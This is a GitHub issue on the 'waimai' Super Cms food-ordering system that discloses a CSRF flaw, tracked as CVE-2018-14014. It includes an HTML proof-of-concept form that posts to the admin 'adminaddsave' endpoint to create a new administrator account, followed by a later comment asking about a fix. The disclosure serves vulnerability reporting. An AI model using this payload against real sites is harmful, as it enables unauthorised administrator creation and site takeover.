caokang / waimai

超级外卖 Super Cms是专业的外卖订餐系统,使用它,不用写代码,只要会打字,就可以管理网站。 前台设计采用采用html5与css3设计,兼容IE6+、Firefox、Chrome、Safari、Opera等主流浏览器. 并可以在微博,微信中完美显示。后台功能模块化设计,用户操作方便。 易于上手,即安即用。 适合餐馆,酒店,外卖平台,糕点店,海鲜店【此地址用于维护】,详细问题,见链接
MIT License
142 stars 83 forks source link

There is a CSRF vulnerability that can add the administrator account #2

Open FiveAourThe opened 6 years ago

FiveAourThe commented 6 years ago

After the administrator logged in, open the following the page poc: csrf.html //add a admin

<html>
<form class="form-horizontal" role="form" action="http://www.waimai.com/admin.php?m=Member&a=adminaddsave" enctype="multipart/form-data" method="post">
<div class="form-group"><label class="col-sm-2 control-label" for="inputEmail3">用户名</label></div>
<div class="col-sm-4"><input name="username" class="form-control" id="inputEmail3" type="text" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div>
<div class="form-group"><label class="col-sm-2 control-label" for="inputPassword3">密码</label></div>
<div class="col-sm-4"><input name="password" class="form-control" id="inputEmail3" type="password" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div></div><div class="form-group"><label class="col-sm-2 control-label" for="inputPassword3">确认密码</label>
<div class="col-sm-4"><input name="repassword" class="form-control" id="inputEmail3" type="password" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div></div><hr><div class="form-group"><label class="col-sm-4 control-label" for="inputPassword3"></label><div class="col-sm-2"><button class="btn btn-primary" type="sumbit">保存</button></div>
<div class="col-sm-6"><span class="help-block"></span></div></div></form>

</html>
NicoleG25 commented 4 years ago

@caokang 你好 是否有解决此漏洞的计划? CVE-2018-14014